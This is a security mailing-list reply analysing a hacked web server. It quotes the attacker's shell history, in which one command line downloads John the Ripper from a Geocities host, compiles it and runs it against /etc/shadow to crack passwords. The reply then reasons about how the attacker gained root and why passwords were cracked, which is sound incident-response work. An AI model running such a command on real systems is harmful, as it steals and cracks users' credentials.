Re: SSH compiled with backdoor

[Javier Fernandez-Sanguino <jfernandez () germinus com>]

steve () example org wrote:

> Hi!
>
> One of my web servers was hacked on July 17, 2005.  bash_history
> showed:
>
> w wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
> john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make
> linux-x86-any-elf;cd ../run;./john /etc/shadow

(...)

> According to john, a couple of users had weak passwords, but root
> seemed well protected.  From looking in all the bash_history, it
> appears the hacker came in from the website account, and did an su
> from there.

He might have escalated privileges to root from the website account 
using a kernel root exploit. You did not mention whose bash_history 
you provided but from the above john run is evident that he is already 
running as root (as he is able to read /etc/shadow).

I wonder why he cracked those passwords if he already had root access. 
Maybe he wanted to use them to propagate the attack to nearby systems 
or to feed the vulnerable passwords to his personal password file.

BTW, 'securedro' seems to have been removed from Geocities, but not 
'cretu_2004' (where the john sources are). The john sources downloaded 
from there, though, seem to be the same as downloaded from Openwall. I 
expected them to have "improved" the run/password.lst and add common 
(for them) passwords there.

Regards

Javier